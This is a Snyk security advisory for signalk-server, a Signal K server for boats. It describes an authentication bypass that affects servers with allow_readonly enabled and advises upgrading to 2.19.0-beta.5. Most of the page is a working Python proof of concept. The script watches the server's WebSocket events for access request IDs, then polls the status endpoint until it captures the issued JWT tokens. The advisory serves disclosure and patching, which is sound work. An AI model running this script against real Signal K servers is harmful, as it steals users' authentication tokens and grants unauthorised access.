Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade signalk-server to version 2.19.0-beta.5 or higher.
signalk-server is an An implementation of a Signal K server for boats.
Affected versions of this package are vulnerable to Authentication Bypass Using an Alternate Path or Channel via the startServerEvents and queryRequest functions. When allow_readonly is enabled, an unauthenticated attacker can obtain authentication tokens for any user by enumerating WebSocket events to discover access request IDs and then polling the access request status endpoint to retrieve issued tokens.
import json, websocket, requests, time
TARGET_IP, TARGET_PORT = "localhost", 3000
TARGET_WS = f"ws://{TARGET_IP}:{TARGET_PORT}"
TARGET_HTTP = f"http://{TARGET_IP}:{TARGET_PORT}"
def poll_for_token(request_id, href):
print(f"[*] Polling started for request {request_id}")
url = f"{TARGET_HTTP}{href}"
while True:
try:
r = requests.get(url)
if r.status_code == 200:
data = r.json()
state = data.get("state")
print(f"[.] Request {request_id} state: {state}")
if state == "COMPLETED":
access_req = data.get("accessRequest", {})
permission = access_req.get("permission")
token = access_req.get("token")
print(f"[*] Request completed - Permission: {permission}, Token present: {bool(token)}")
if token:
print(f"[+] TOKEN STOLEN")
print(f"[+] Permission: {permission}")
print(f"[+] JWT Token: {token}")
return token
else:
print(f"[-] Request {request_id} denied or no token")
return None
else:
print(f"[-] HTTP {r.status_code} for request {request_id}")
except Exception as e:
print(f"[-] Error polling {request_id}: {e}")
time.sleep(5)
def monitor_and_steal_tokens():
uri = f"{TARGET_WS}/signalk/v1/stream?serverevents=all"
print(f"[*] Connecting to {uri}")
ws = websocket.create_connection(uri)
print("[+] Connected, monitoring for ACCESS_REQUEST events...")
while True:
message = ws.recv()
msg = json.loads(message)
if msg.get("type") == "ACCESS_REQUEST":
print("[+] ACCESS_REQUEST event received!")
data = msg.get("data", [])
if data:
req = data[0]
request_id = req.get('requestId')
permissions = req.get('clientRequest', {}).get('permissions')
href = req.get('href', f'/signalk/v1/requests/{request_id}')
print(f"[*] Found request: {request_id}")
print(f"[*] Closing WebSocket and starting polling...")
ws.close()
poll_for_token(request_id, href)
break
if __name__ == "__main__":
monitor_and_steal_tokens()